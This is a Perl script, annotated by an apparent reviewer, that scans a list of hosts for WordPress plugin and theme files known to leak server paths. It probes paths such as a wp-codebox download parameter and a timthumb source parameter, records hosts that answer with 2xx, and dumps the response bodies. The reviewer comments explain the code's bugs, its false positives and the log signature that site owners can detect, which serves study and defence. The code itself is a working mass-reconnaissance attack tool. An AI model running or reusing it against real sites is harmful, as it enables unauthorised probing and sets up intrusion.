- #!/usr/bin/perl
- # Reviewer summary: this script reads a list of hosts from a local file and,
- # for each host, issues one HTTP GET per entry in the fixed @files list below,
- # recording any URL that returns a 2xx status.  It is a probing tool aimed at
- # WordPress installs; the notes in this file describe what the code actually
- # does, its defects, and what a site owner would see in their logs.
- # No `use strict; use warnings;` — every variable below is an unscoped package
- # global, so typos and the context mistakes noted later go undiagnosed.
- use HTTP::Request;
- use LWP::UserAgent;
- use LWP::Simple;
- # Both `cls` and `title` are Windows console commands; on other platforms these
- # system() calls simply fail (the return value is not checked).
- system ("cls");
- system ("title Ful Path vul scanner ");
- print q(
- +---------------------------------------+
- | Wordpress Full Path Disclosure Tester |
- | Coded Attack |
- | Lover PerL |
- | Www.iq-team.org |
- +---------------------------------------+
- );
- sleep (1);
- # Scalar assignment of @ARGV: $ARG holds the argument count, not an argument.
- $ARG = @ARGV;
- ($host,$outfile) = @ARGV;
- # `@ARGV eq 0` is a string comparison of the array in scalar context (its
- # element count stringified), so this branch is taken only with no arguments.
- if(@ARGV eq 0)
- {
- # Despite the prompt wording, $host is opened as a LOCAL file path below, not
- # fetched as a URL.
- print "\n\n[+] Enter List File Url :";
- $host=<STDIN>;
- chomp($host);
- print "[+] Enter Name File To Save :";
- $outfile=<STDIN>;
- chomp($outfile);
- # Two-argument open on a bareword handle with user-supplied input; the "<"
- # prefix fixes the mode, but trailing whitespace in the name is still
- # silently stripped and the handle is a global.  Note also that || binds to
- # the string, not to open(), though here the string is always true.
- open (SITE, "<$host") || die "[-] Can't open the List of site file !";
- # Each line of the list file is expected to be one host, presumably including
- # its scheme (it is concatenated verbatim with a path below) — unverified.
- @SITE = <SITE>;
- close SITE;
- }
- # $ARG is the argument count; when @ARGV is non-empty it is >= 1, so this
- # condition is never true and any command-line invocation falls through to
- # exit.  Even if it were reached, @SITE is never populated on this path, so
- # the scan loop below would run zero times.
- elsif ($ARG < 1)
- {
- $host = $ARGV[0];
- $outfile = $ARGV[1];
- }
- else
- {
- exit;
- }
- # Outer loop: one pass per host read from the list file.
- foreach my $xp (@SITE) {
- chomp $xp;
- $hosts = $xp;
- print "\n\n";
- print "\t\t Scanning ... $hosts\n";
- sleep(1);
- print "\n\n";
- # Fixed set of plugin/theme paths probed on every host.  Detection note for
- # site owners: a single client requesting this exact sequence of wp-content
- # paths in quick succession, with libwww-perl's default User-Agent (no agent
- # string is set on the LWP::UserAgent object below), is a clear log signature.
- @files = (
- "/wp-content/themes/dt-chocolate/index.php",
- "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
- "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
- "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
- "/wp-content/themes/slash/index.php",
- "/wp-content/plugins/vote-it-up/voteitup.php",
- "/wp-content/plugins/wp-polls/polls-templates.php",
- "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
- "/wp-content/plugins/dynamic-headers/custom-header.php",
- "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
- "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
- "/wp-content/plugins/wp-events/wp-events.php",
- "/wp-content/plugins/wp-super-cache/wp-cache.php",
- "/wp-content/plugins/admin-menu-editor/menu-editor.php",
- "/wp-content/plugins/wp-photo-album/wppa.php",
- "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
- "/wp-content/plugins/superslider-show/superslider-show.php",
- "/wp-content/themes/sahifa/category.php",
- "/wp-content/themes/moneymasters/index.php",
- "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
- "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",);
- # Inner loop: one GET per path.  A new UserAgent is built on every iteration
- # with no timeout, proxy or agent string configured, so defaults apply.
- foreach $vul(@files){
- $url = $hosts.$vul;
- $request = HTTP::Request->new(GET=>$url);
- $useragent = LWP::UserAgent->new();
- $response = $useragent->request($request);
- # is_success() is true for ANY 2xx response.  It does not inspect the body,
- # so a site that answers 200 for unknown paths (catch-all rewrites, custom
- # 404 pages served with status 200) is reported as "infected" regardless of
- # whether anything was disclosed — expect false positives.
- if ($response->is_success){
- print "The $url is infected\n";
- # Unchecked two-argument append open on a bareword handle; a failed open is
- # ignored and the print to TN silently goes nowhere.
- open(TN,">>$outfile");
- print TN "$url\n";
- close(TN);
- # Interactive prompt inside the scan loop: the scan blocks on STDIN after
- # every hit, so this cannot run unattended.
- print "\n\n[*] Do you want to see The Result [Y/N] : ";
- $answer=<STDIN>;
- chomp($answer);
- print "+-----------------------------------------------------+\n";
- if (lc($answer) eq "y")
- {
- # Dumps the raw response body to the terminal with no decoding or
- # length limit.
- print $response->content;
- print "\n\n[*] Find your path easly ;) ";
- }
- else
- {
- print "\n[-] Ok as you like good bye :) !! \n\n";
- }
- }
- }
- }